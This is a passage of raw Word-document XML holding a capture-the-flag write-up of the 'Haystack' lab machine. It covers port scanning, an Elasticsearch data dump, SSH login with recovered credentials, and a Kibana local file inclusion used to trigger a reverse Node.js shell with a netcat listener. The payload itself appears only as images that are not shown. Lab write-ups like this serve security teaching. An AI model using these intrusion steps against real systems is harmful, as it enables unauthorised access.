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9F49A" w14:textId="2620496F" w:rsidR="006471F8" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Haystack Writeup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FADE1D8" w14:textId="77F018E0" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Pierson Carulli (Cryptic Shadow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F73D37" w14:textId="37F439ED" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5F15DC" w14:textId="6DD66DD0" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563FBD0C" w14:textId="66445232" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66122406" w14:textId="60FCEE8B" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625827B5" w14:textId="6AF82318" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C672F7A" w14:textId="2D953A8E" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F42E41" w14:textId="429F5731" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E0DBFF" w14:textId="4E64C6BD" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B29194E" w14:textId="42BC743E" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C43D1F" w14:textId="4D69BCDB" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7EFB4B" w14:textId="5E7B4F00" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B929C6D" w14:textId="0287CAE2" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7EE5F1" w14:textId="55481DFA" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB2DEFB" w14:textId="4B2110E2" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9195CD" w14:textId="422CC24C" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A26BBDE" w14:textId="4B0220D2" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BB1E4B8" w14:textId="62A024CF" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B0FB5B" w14:textId="04A7A9F4" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2FAB97" w14:textId="52D6914D" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9121D3" w14:textId="36CB4FE1" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C4355E" w14:textId="72402DB0" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2325B146" w14:textId="780E997A" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6322CF5C" w14:textId="4979E7F2" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5032F4" w14:textId="02BF8965" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758E81C3" w14:textId="1CF19DAA" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Scanning and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7DE4DE" w14:textId="462678EB" w:rsidR="007563F3" w:rsidRPr="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IMPORTANT: Attackers IP was: 10.10.14.13, and the victim’s IP was 10.10.10.115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AF910F" w14:textId="77777777" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">First perform an NMAP scan on the target (10.10.10.115). The results of the scan are shown below: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20721F18" w14:textId="77777777" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="011E4628" w14:textId="77777777" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NMAP SCAN RESULTS GO HERE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8903A2" w14:textId="77777777" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B8A052" w14:textId="77777777" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The NMAP scan reveals that the open ports on haystack are 22, 80, and 9200. Port 22 is using OPENSSH version 7.4, port 80 is using Nginx 1.12.2 and port 9200 is using Elasticsearch. Visiting the Nginx server on port 80 yields an image. At first glance this is not very interesting; however, downloading the image and running strings uncovers a clue: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DDD658" w14:textId="77777777" w:rsidR="007563F3" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E06E594" wp14:editId="20A39CCE">
            <wp:extent cx="5943600" cy="35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2425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A3BDB" w14:textId="64A99DA3" w:rsidR="007E6EAB" w:rsidRDefault="007563F3" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This is a base64 encoded string</w:t>
      </w:r>
      <w:r w:rsidR="005837BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can be decoded using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="005837BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005837BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> decoder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5BAC01" w14:textId="7EF18C41" w:rsidR="007563F3" w:rsidRDefault="007E6EAB" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C0A6F38" wp14:editId="54C75AC1">
            <wp:extent cx="5943600" cy="261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17470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="007563F3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E9A45" w14:textId="23750878" w:rsidR="007E6EAB" w:rsidRDefault="007E6EAB" w:rsidP="007563F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If Spanish is not your native language you may want to use google translate to make sense of the clue. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AE2AC4" w14:textId="5CDEC9F6" w:rsidR="007E6EAB" w:rsidRDefault="007E6EAB" w:rsidP="007E6EAB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F23B69E" wp14:editId="47CBF7AE">
            <wp:extent cx="5612130" cy="11745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1074" cy="1212044"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6DB73" w14:textId="6BC0A56B" w:rsidR="007E6EAB" w:rsidRDefault="007E6EAB" w:rsidP="007E6EAB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Browsing to </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00EA39FF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://10.10.10.115:9200</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uncovers pertinent information about the target. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896F2F4" w14:textId="7DF20CC4" w:rsidR="007E6EAB" w:rsidRDefault="007E6EAB" w:rsidP="007E6EAB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0629DE0D" wp14:editId="40F123AA">
            <wp:extent cx="4674870" cy="32479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726" cy="3252005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE3DBEA" w14:textId="445FFF90" w:rsidR="005837BE" w:rsidRDefault="007E6EAB" w:rsidP="007E6EAB">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A quick google search reveals that Elasticsearch is a database that stores data in JSON format. Digging a bit deeper uncovers the syntax for querying the database. The query </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00EA39FF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://10.10.10.115:9200/_all/_search?q=*:*&amp;size=10000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> will </w:t>
      </w:r>
      <w:r w:rsidR="005837BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dump everything from each table and display a total of 10000 results. The clues are hidden somewhere in the “haystack” to find them simply search for base64 encoded strings. The following stack overflow post may save some time/frustration: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="005837BE" w:rsidRPr="00EA39FF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/475074/regex-to-parse-or-validate-base64-data/475217#475217</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005837BE">
        <w:t>. The needle can be found below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E0BD81" w14:textId="220721DC" w:rsidR="007E6EAB" w:rsidRPr="007E6EAB" w:rsidRDefault="005837BE" w:rsidP="007E6EAB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06AABF7B" wp14:editId="04ABF1A0">
            <wp:extent cx="594360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57250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D33B96" w14:textId="5A1159A5" w:rsidR="007E6EAB" w:rsidRDefault="005837BE" w:rsidP="007E6EAB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005837BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Excellent, now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005837BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005837BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the credentials to login via SSH. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A8EA34" w14:textId="792DAFDE" w:rsidR="005837BE" w:rsidRDefault="005837BE" w:rsidP="007E6EAB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C0D5D3" w14:textId="38F720EA" w:rsidR="005837BE" w:rsidRDefault="005837BE" w:rsidP="005837BE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Expanding Influence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21F3C7" w14:textId="2391DBE8" w:rsidR="00E75AD1" w:rsidRDefault="00485DBD" w:rsidP="005837BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Viewing the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/passwd file reveals that there are several other users on the system. Haystack is using Elasticsearch version 6.4.2, which is vulnerable to an LFI (Local File Inclusion) attack</w:t>
      </w:r>
      <w:r w:rsidR="00E75AD1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE191E" w14:textId="71A4AB31" w:rsidR="00E75AD1" w:rsidRDefault="00E75AD1" w:rsidP="005837BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="314DFE7C" wp14:editId="24B0F9BB">
            <wp:extent cx="5943600" cy="200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66AAFDA8" w14:textId="727BC78A" w:rsidR="00E75AD1" w:rsidRDefault="00E75AD1" w:rsidP="005837BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This attack only works on a Kibana’s API console, which is not on any of the ports that were found by the original NMAP scan. Luckily, running netstat on the target system (netstat must be uploaded first) reveals that there is a service running on port 5601.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D447DA3" w14:textId="59633202" w:rsidR="00E75AD1" w:rsidRDefault="00E75AD1" w:rsidP="005837BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F07EF66" wp14:editId="459AA971">
            <wp:extent cx="5943600" cy="108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4D826E63" w14:textId="16C4232C" w:rsidR="00E75AD1" w:rsidRDefault="00E75AD1" w:rsidP="005837BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EA2C997" wp14:editId="2C97E780">
            <wp:extent cx="5943600" cy="1482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82090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB671F8" w14:textId="31EEE7D8" w:rsidR="005837BE" w:rsidRDefault="00E75AD1" w:rsidP="005837BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00485DBD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00485DBD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00485DBD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory is world writeable. Adding the file t/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">myshell.js (t is a new directory that is can be accessed by any user and myshell.js is reverse Node JS shell). Making t a world accessible file is accomplished using the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 777 t (the same command can be used to make the reverse shell accessible). To exploit the LFI vulnerability navigate to /var/log/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kibana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener on the port specified in the reverse shell. The command to trigger the LFI and the resulting shell can be viewed below. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35410616" w14:textId="2795FD2A" w:rsidR="00E75AD1" w:rsidRDefault="00E75AD1" w:rsidP="005837BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="408D2AD8" wp14:editId="563E1AC6">
            <wp:extent cx="5943600" cy="1578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78610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="401E08ED" w14:textId="714D06AC" w:rsidR="00E75AD1" w:rsidRDefault="00E75AD1" w:rsidP="005837BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
